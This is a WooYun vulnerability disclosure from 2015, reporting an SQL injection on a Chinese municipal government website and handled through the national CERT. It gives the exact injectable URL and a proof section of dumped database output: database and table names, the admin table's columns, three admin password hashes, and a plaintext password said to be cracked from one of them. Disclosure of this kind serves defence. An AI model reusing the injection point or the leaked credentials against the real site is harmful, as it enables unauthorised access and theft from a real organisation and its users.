当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130851

漏洞标题:中国姜堰政府网站SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: dalamar

提交时间:2015-08-03 21:00

修复时间:2015-09-20 10:24

公开时间:2015-09-20 10:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-03: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

RT

详细说明:

中国姜堰政府网站SQL注入漏洞
注入地址:http://www.jys.gov.cn/public/js/count.php?i=262648

漏洞证明:

| pw_config                             |
| pw_creditlog                          |
| pw_credits                            |
| pw_customfield                        |
| pw_cwritedata                         |
| pw_datanalyse                         |
| pw_datastate                          |
| pw_datastore                          |
| pw_debatedata                         |
| pw_debates                            |
| pw_diary                              |
| pw_diarytype                          |
| pw_draft                              |
| pw_elements                           |
| pw_extragroups                        |
| pw_favors                             |
| pw_feed                               |
| pw_filter                             |
| pw_filter_class                       |
| pw_filter_dictionary                  |
| pw_focus                              |
| pw_forumdata                          |
| pw_forumlog                           |
| pw_forummsg                           |
| pw_forums                             |
| pw_forumsell                          |
| pw_forumsextra                        |
| pw_forumtype                          |
| pw_friends                            |
| pw_friendtype                         |
| pw_group_replay                       |
| pw_hack                               |
| pw_help                               |
| pw_invitecode                         |
| pw_inviterecord                       |
| pw_invoke                             |
| pw_invokepiece                        |
| pw_ipstates                           |
| pw_job                                |
| pw_jober                              |
| pw_medalinfo                          |
| pw_medalslogs                         |
| pw_medaluser                          |
| pw_membercredit                       |
| pw_memberdata                         |
| pw_memberinfo                         |
| pw_members                            |
| pw_memo                               |
| pw_modehot                            |
| pw_modules                            |
| pw_mpageconfig                        |
| pw_ms_attachs                         |
| pw_ms_configs                         |
| pw_ms_messages                        |
| pw_ms_relations                       |
| pw_ms_replies                         |
| pw_ms_searchs                         |
| pw_ms_tasks                           |
| pw_msg                                |
| pw_msgc                               |
| pw_msglog                             |
| pw_nav                                |
| pw_oboard                             |
| pw_online                             |
| pw_ouserdata                          |
| pw_overprint                          |
| pw_owritedata                         |
| pw_pagecache                          |
| pw_pageinvoke                         |
| pw_pcfield                            |
| pw_pcmember                           |
| pw_pcvalue1                           |
| pw_pcvalue2                           |
| pw_permission                         |
| pw_pidtmp                             |
| pw_pinglog                            |
| pw_plan                               |
| pw_polls                              |
| pw_postcate                           |
| pw_posts                              |
| pw_postsfloor                         |
| pw_poststopped                        |
| pw_privacy                            |
| pw_proclock                           |
| pw_pushdata                           |
| pw_pushpic                            |
| pw_rate                               |
| pw_rateconfig                         |
| pw_rateresult                         |
| pw_recycle                            |
| pw_report                             |
| pw_reward                             |
| pw_schcache                           |
| pw_setform                            |
| pw_share                              |
| pw_sharelinks                         |
| pw_singleright                        |
| pw_smiles                             |
| pw_space                              |
| pw_sqlcv                              |
| pw_stamp                              |
| pw_stopic                             |
| pw_stopicblock                        |
| pw_stopiccategory                     |
| pw_stopicpictures                     |
| pw_stopicunit                         |
| pw_styles                             |
| pw_tagdata                            |
| pw_tags                               |
| pw_task                               |
| pw_threads                            |
| pw_tmsgs                              |
| pw_toollog                            |
| pw_tools                              |
| pw_topiccate                          |
| pw_topicfield                         |
| pw_topicmodel                         |
| pw_topictype                          |
| pw_topicvalue1                        |
| pw_topicvalue2                        |
| pw_topicvalue3                        |
| pw_topicvalue4                        |
| pw_topicvalue5                        |
| pw_topicvalue6                        |
| pw_topicvalue7                        |
| pw_topicvalue8                        |
| pw_tpl                                |
| pw_tpltype                            |
| pw_trade                              |
| pw_tradeorder                         |
| pw_ucapp                              |
| pw_ucnotify                           |
| pw_ucsyncredit                        |
| pw_userapp                            |
| pw_userbinding                        |
| pw_usercache                          |
| pw_usergroups                         |
| pw_usertool                           |
| pw_voter                              |
| pw_weibo_cmrelations                  |
| pw_weibo_cnrelations                  |
| pw_weibo_comment                      |
| pw_weibo_content                      |
| pw_weibo_referto                      |
| pw_weibo_relations                    |
| pw_windcode                           |
| pw_wordfb                             |
| pw_write_smiles                       |
+---------------------------------------+
Database: jiangyan
[25 tables]
+---------------------------------------+
| bungmi_access                         |
| bungmi_admin                          |
| bungmi_answer                         |
| bungmi_answer_result                  |
| bungmi_article                        |
| bungmi_auth                           |
| bungmi_category                       |
| bungmi_config                         |
| bungmi_exam                           |
| bungmi_file                           |
| bungmi_group                          |
| bungmi_links                          |
| bungmi_page                           |
| bungmi_part                           |
| bungmi_partcode                       |
| bungmi_partdown                       |
| bungmi_participants                   |
| bungmi_partimage                      |
| bungmi_partlink                       |
| bungmi_parttext                       |
| bungmi_partvideo                      |
| bungmi_photo                          |
| bungmi_question                       |
| bungmi_question_item                  |
| bungmi_video                          |
+---------------------------------------+
Database: loyaa3
[46 tables]
+---------------------------------------+
| department                            |
| department2                           |
| department_sort                       |
| functionlibrary                       |
| module_info                           |
| myzqk                                 |
| news_category                         |
| news_collection                       |
| news_detail                           |
| news_extend                           |
| news_image                            |
| news_keyword                          |
| news_special                          |
| news_statistics                       |
| news_table                            |
| news_task                             |
| news_title                            |
| sub_client                            |
| sub_fee                               |
| sub_templates                         |
| system                                |
| templates_info                        |
| templates_team                        |
| tmp_click                             |
| upgrade                               |
| user_info                             |
| user_team                             |
| yz_ask_answer                         |
| yz_chat                               |
| yz_event                              |
| yz_exam                               |
| yz_gcxm_dw                            |
| yz_gcxm_gc                            |
| yz_gcxm_pj                            |
| yz_gcxm_ry                            |
| yz_gp_data                            |
| yz_gp_family                          |
| yz_guestbook                          |
| yz_information_publish                |
| yz_mobile                             |
| yz_subscribe                          |
| yz_survey_data                        |
| yz_survey_module                      |
| yz_tmp_dc1                            |
| yz_vote                               |
| yz_vote_data                          |
+---------------------------------------+
Database: old_jys_web
[10 tables]
+---------------------------------------+
| admin                                 |
| diary                                 |
| dospoll                               |
| info_cat                              |
| infos                                 |
| no1                                   |
| ospoll                                |
| poll                                  |
| spoll                                 |
| zp                                    |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Database: jys_gov_cn
[10 tables]
+---------------------------------------+
| admin                                 |
| diary                                 |
| dospoll                               |
| info_cat                              |
| infos                                 |
| no1                                   |
| ospoll                                |
| poll                                  |
| spoll                                 |
| zp                                    |
+---------------------------------------+


Database: jys_gov_cn
Table: admin
[8 columns]
+---------------+------------------+
| Column        | Type             |
+---------------+------------------+
| admin_caption | varchar(150)     |
| admin_id      | int(11) unsigned |
| admin_name    | varchar(50)      |
| admin_pass    | varchar(32)      |
| admin_time    | datetime         |
| admin_type    | char(1)          |
| admin_user    | varchar(32)      |
| author_id     | int(11) unsigned |
+---------------+------------------+


Database: jys_gov_cn
Table: admin
[3 entries]
+----------------------------------+---------------+
| admin_pass                       | admin_name    |
+----------------------------------+---------------+
| fb17403e1929d90c362c1f00e03299ca | <blank>       |
| 4be185d60d63a3965347267f813f30d7 | <blank>       |
| 187f1568e64af66c5da1dea0d2cf6ca1 | administrator |
+----------------------------------+---------------+


md5解密后为:jydzzw_16

修复方案:

你懂得

版权声明:转载请注明来源 dalamar@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-06 10:22

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无